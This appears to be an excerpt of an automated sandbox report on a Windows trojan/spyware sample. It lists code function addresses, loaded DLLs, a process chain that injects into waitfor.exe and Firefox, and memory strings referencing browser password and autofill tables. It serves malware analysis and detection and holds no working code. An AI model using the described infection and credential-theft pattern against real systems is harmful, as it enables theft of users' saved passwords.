          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333300A02_2_333300A0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3337508C2_2_3337508C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F70F12_2_333F70F1
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334B0D02_2_3334B0D0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333427602_2_33342760
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334A7602_2_3334A760
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F67572_2_333F6757
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333DD62C2_2_333DD62C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335C6002_2_3335C600
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333646702_2_33364670
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333ED6462_2_333ED646
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333406802_2_33340680
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FF6F62_2_333FF6F6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333C6E02_2_3333C6E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B36EC2_2_333B36EC
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FA6C02_2_333FA6C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340A5262_2_3340A526
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FF5C92_2_333FF5C9
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F75C62_2_333F75C6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333404452_2_33340445
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333AD4802_2_333AD480
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FFB2E2_2_333FFB2E
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340B102_2_33340B10
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3337DB192_2_3337DB19
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B4BC02_2_333B4BC0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FCA132_2_333FCA13
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FEA5B2_2_333FEA5B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335FAA02_2_3335FAA0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FFA892_2_333FFA89
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333E9A02_2_3333E9A0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FE9A62_2_333FE9A6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333099E82_2_333099E8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333859C02_2_333859C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333E08352_2_333E0835
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E8102_2_3336E810
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333438002_2_33343800
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333498702_2_33349870
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B8702_2_3335B870
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FF8722_2_333FF872
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333268682_2_33326868
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333B98B22_2_333B98B2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333568822_2_33356882
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F78F32_2_333F78F3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F18DA2_2_333F18DA
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333428C02_2_333428C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3334CF002_2_3334CF00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FFF632_2_333FFF63
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FEFBF2_2_333FEFBF
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33346FE02_2_33346FE0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F1FC62_2_333F1FC6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333E0E6D2_2_333E0E6D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33360E502_2_33360E50
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33382E482_2_33382E48
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33341EB22_2_33341EB2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F0EAD2_2_333F0EAD
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33332EE82_2_33332EE8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F9ED22_2_333F9ED2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333FFD272_2_333FFD27
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333AD002_2_3333AD00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33340D692_2_33340D69
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F7D4C2_2_333F7D4C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33352DB02_2_33352DB0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0529A5264_2_0529A526
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528F5C94_2_0528F5C9
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052875C64_2_052875C6
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D04454_2_051D0445
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0523D4804_2_0523D480
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D27604_2_051D2760
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051DA7604_2_051DA760
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052867574_2_05286757
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0526D62C4_2_0526D62C
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051EC6004_2_051EC600
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0527D6464_2_0527D646
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051F46704_2_051F4670
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D06804_2_051D0680
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052436EC4_2_052436EC
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528F6F64_2_0528F6F6
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528A6C04_2_0528A6C0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051CC6E04_2_051CC6E0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051BF1134_2_051BF113
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0526D1304_2_0526D130
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0529010E4_2_0529010E
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0521717A4_2_0521717A
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D51C04_2_051D51C0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051EB1E04_2_051EB1E0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0527E0764_2_0527E076
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0520508C4_2_0520508C
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051C00A04_2_051C00A0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051DB0D04_2_051DB0D0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052870F14_2_052870F1
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051DE3104_2_051DE310
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528F3304_2_0528F330
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051C13804_2_051C1380
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528124C4_2_0528124C
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051BD2EC4_2_051BD2EC
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528FD274_2_0528FD27
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051CAD004_2_051CAD00
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05287D4C4_2_05287D4C
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D0D694_2_051D0D69
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051E2DB04_2_051E2DB0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D9DD04_2_051D9DD0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0526FDF44_2_0526FDF4
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051C0C124_2_051C0C12
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051DAC204_2_051DAC20
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05286C694_2_05286C69
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528EC604_2_0528EC60
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0527EC4C4_2_0527EC4C
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D3C604_2_051D3C60
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05269C984_2_05269C98
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051E8CDF4_2_051E8CDF
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0529ACEB4_2_0529ACEB
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05257CE84_2_05257CE8
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051EFCE04_2_051EFCE0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051DCF004_2_051DCF00
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528FF634_2_0528FF63
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528EFBF4_2_0528EFBF
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05281FC64_2_05281FC6
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D6FE04_2_051D6FE0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05270E6D4_2_05270E6D
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051F0E504_2_051F0E50
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05212E484_2_05212E48
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05280EAD4_2_05280EAD
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D1EB24_2_051D1EB2
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051C2EE84_2_051C2EE8
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05289ED24_2_05289ED2
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528E9A64_2_0528E9A6
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051CE9A04_2_051CE9A0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052159C04_2_052159C0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051FE8104_2_051FE810
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052708354_2_05270835
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D38004_2_051D3800
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052458704_2_05245870
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528F8724_2_0528F872
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D98704_2_051D9870
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051EB8704_2_051EB870
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051B68684_2_051B6868
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052498B24_2_052498B2
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051E68824_2_051E6882
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052878F34_2_052878F3
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D28C04_2_051D28C0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_052818DA4_2_052818DA
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528FB2E4_2_0528FB2E
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051D0B104_2_051D0B10
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0520DB194_2_0520DB19
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_05244BC04_2_05244BC0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528CA134_2_0528CA13
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528EA5B4_2_0528EA5B
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0528FA894_2_0528FA89
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_051EFAA04_2_051EFAA0
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0508F0384_2_0508F038
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0508E4754_2_0508E475
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0508E80C4_2_0508E80C
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0508D8D84_2_0508D8D8
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4_2_0508E3544_2_0508E354
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 05205050 appears 36 times
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 0524EF10 appears 105 times
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 05217BE4 appears 96 times
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 051BB910 appears 268 times
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 0523E692 appears 86 times
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: String function: 33387BE4 appears 80 times
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: String function: 333BEF10 appears 92 times
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: String function: 333AE692 appears 78 times
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: String function: 3332B910 appears 238 times
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: String function: 33375050 appears 33 times
          Source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewaitfor.exej% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033283000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000002.28574257270.00000000335D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000003.28457645000.00000000330CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 02Eh1ah35H.exe
          Source: 02Eh1ah35H.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@27/16
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00404835 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404835
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile created: C:\Users\user\AppData\Local\Temp\nsgF4BC.tmpJump to behavior
          Source: 02Eh1ah35H.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: waitfor.exe, 00000004.00000002.33485556560.00000000082C5000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485556560.00000000082BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: waitfor.exe, 00000004.00000002.33485556560.000000000831D000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33480610058.000000000344A000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
          Source: 02Eh1ah35H.exeReversingLabs: Detection: 50%
          Source: 02Eh1ah35H.exeVirustotal: Detection: 69%
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeFile read: C:\Users\user\Desktop\02Eh1ah35H.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\02Eh1ah35H.exe "C:\Users\user\Desktop\02Eh1ah35H.exe"
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeProcess created: C:\Users\user\Desktop\02Eh1ah35H.exe "C:\Users\user\Desktop\02Eh1ah35H.exe"
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
          Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeProcess created: C:\Users\user\Desktop\02Eh1ah35H.exe "C:\Users\user\Desktop\02Eh1ah35H.exe"Jump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: msi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: msi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: wldp.dllJump to behavior
